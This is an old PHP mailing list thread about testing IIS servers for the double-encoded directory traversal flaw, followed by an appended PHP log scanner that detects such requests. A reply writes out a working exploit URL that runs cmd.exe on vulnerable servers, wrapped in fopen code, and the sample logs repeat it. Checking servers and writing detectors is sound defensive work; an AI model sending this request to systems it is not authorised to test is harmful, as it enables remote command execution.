That is basically going to the URL
www.whatever.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
so do what the other guy said
> $site = fopen("http://www.whatever.com/", "r");
> $contents = fread($site, 102400);
> fclose($site);
but like this:
> $site = fopen('http://www.whatever.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\', "r");
> $contents = fread($site, 102400);
> fclose($site);
BTW there are MANY MANY MANY versions of this vulnerability, so just checking
this one won't cover them all. Check out www.SecurityFocus.com and click the
Vulnerabilities link on the left.
Andrew
----- Original Message -----
From: "Clayton Dukes" <[EMAIL PROTECTED]>
To: "Matthew Loff" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Tuesday, July 17, 2001 7:37 PM
Subject: Re: [PHP] GET Command
> Hi,
> Here's what I'm trying to do:
>
> I want to test an IIS server for an invulnerability. This is done by sending
> a GET command to test for it.
> Here's a blurb from the security advisory that I am working with:
>
> ---snip---
> A scan is performed over some region of the Internet, searching for web
> servers accepting TCP connections on port 80. A specially formed "HTTP GET"
> request is then sent over the accepted connection to the server:
> GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
> ---snip---
>
> How can I do a simple page where the user inputs the URL (www.whatever.com)
> and it runs this test, telling the user if it passes or fails, and returns
> the output?
>
> Btw, the security advisory comes from http://grc.com/dos/grcdos.htm which
> outlines some very interesting things happening with IRC based DoS attacks,
> in case you're interested.
>
>
> Thanks!
>
>
> Clayton Dukes
> CCNA, CCDA, CCDP, CCNP
> (c) 904.477.7825
> (h) 904.292.1881
> Download Free Essays, Term Papers and Cisco Training from http://www.gdd.net
>
>
> ----- Original Message -----
> From: Matthew Loff
> To: 'Clayton Dukes' ; [EMAIL PROTECTED]
> Sent: Tuesday, July 17, 2001 2:11 PM
> Subject: RE: [PHP] GEt Command
>
>
>
> $site = fopen("http://www.whatever.com/", "r");
> $contents = fread($site, 102400);
> fclose($site);
>
> -----Original Message-----
> From: Clayton Dukes [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, July 17, 2001 2:08 PM
> To: [EMAIL PROTECTED]
> Subject: [PHP] GEt Command
>
>
> Does anyone have a simple script that will GET a web page and return the
> reply?
>
> Something like this:
>
> // Open a socket to $host and send a GET request for $path.
> // Returns the open socket on success, 0 on failure.
> function getpage($host, $path) {
>     $hdr  = sprintf("GET %s HTTP/1.0\r\n", $path);
>     $hdr .= "Content-type: application/x-www-form-urlencoded\r\n";
>     $hdr .= "Accept: text/html\r\nAccept: text/plain\r\n";
>     $hdr .= "User-Agent: Mozilla/1.0\r\n\r\n";
>
>     // $errno and $errstr are filled in by fsockopen() on failure
>     $fp = fsockopen($host, 80, $errno, $errstr, 45);
>     if (!$fp) {
>         echo "$host open error: $errstr $errno .\n";
>         return(0);
>     } else {
>         fputs($fp, $hdr);
>         return($fp);
>     }
> }
>
> // Read and print the reply line by line
> $fp = getpage("www.whatever.com", "/");
> if ($fp) {
>     while (!feof($fp)) {
>         $buff = fgets($fp, 1024);
>         //dofoo($buff);
>         echo "$buff";
>     }
>     fclose($fp);
> }
>
>
> TIA!
>
> Clayton Dukes
> CCNA, CCDA, CCDP, CCNP
> (c) 904.477.7825
> (h) 904.292.1881
> Download Free Essays, Term Papers and Cisco Training from http://www.gdd.net
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, e-mail: [EMAIL PROTECTED]
> For additional commands, e-mail: [EMAIL PROTECTED]
> To contact the list administrators, e-mail: [EMAIL PROTECTED]
>
>
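
The point made at the top of this thread, that checking for one URL will not cover every variant, applies on the detection side as well. As an added example (not code from anyone in the thread), the PHP below peels percent-encoding from a request path one layer at a time and reports after how many passes a `../` or `..\` becomes visible; the function names and log lines are constructed for illustration.

```php
<?php
// Added example: find request paths that hide "../" or "..\" behind one or
// more layers of percent-encoding. A server decodes a path once, so a
// sequence that only appears after two or more passes was double-encoded.

// Returns the number of decode passes after which a traversal sequence is
// visible (0 = visible as sent), or -1 if none is found.
function traversal_depth(string $uri, int $maxPasses = 4): int
{
    $path = explode('?', $uri, 2)[0];      // query string is not a path
    for ($pass = 0; $pass <= $maxPasses; $pass++) {
        if (preg_match('#\.\.[/\\\\]#', $path)) {
            return $pass;
        }
        $decoded = rawurldecode($path);
        if ($decoded === $path) {
            break;                          // nothing left to decode
        }
        $path = $decoded;
    }
    return -1;
}

// Scans access-log lines and returns one entry per suspicious request.
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        if (!preg_match('#"[A-Z]+ (\S+)#', $line, $m)) {
            continue;                       // no request field on this line
        }
        $depth = traversal_depth($m[1]);
        if ($depth >= 0) {
            $hits[] = ['line' => $n + 1, 'passes' => $depth, 'uri' => $m[1]];
        }
    }
    return $hits;
}

$sampleLog = [  // constructed lines in common log format
    '192.0.2.10 - - [17/Jul/2001:19:30:01 -0400] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.77 - - [17/Jul/2001:19:30:05 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 0',
    '192.0.2.77 - - [17/Jul/2001:19:30:06 -0400] "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0',
    '192.0.2.31 - - [17/Jul/2001:19:31:12 -0400] "GET /docs/a%20b.html HTTP/1.0" 200 512',
];

foreach (scan_log($sampleLog) as $hit) {
    printf("line %d: traversal visible after %d decode pass(es): %s\n",
        $hit['line'], $hit['passes'], $hit['uri']);
}
```

Lines 2 and 3 of the sample are reported with 2 and 1 passes respectively; the encoded space in line 4 is not, because decoding it never produces a traversal sequence.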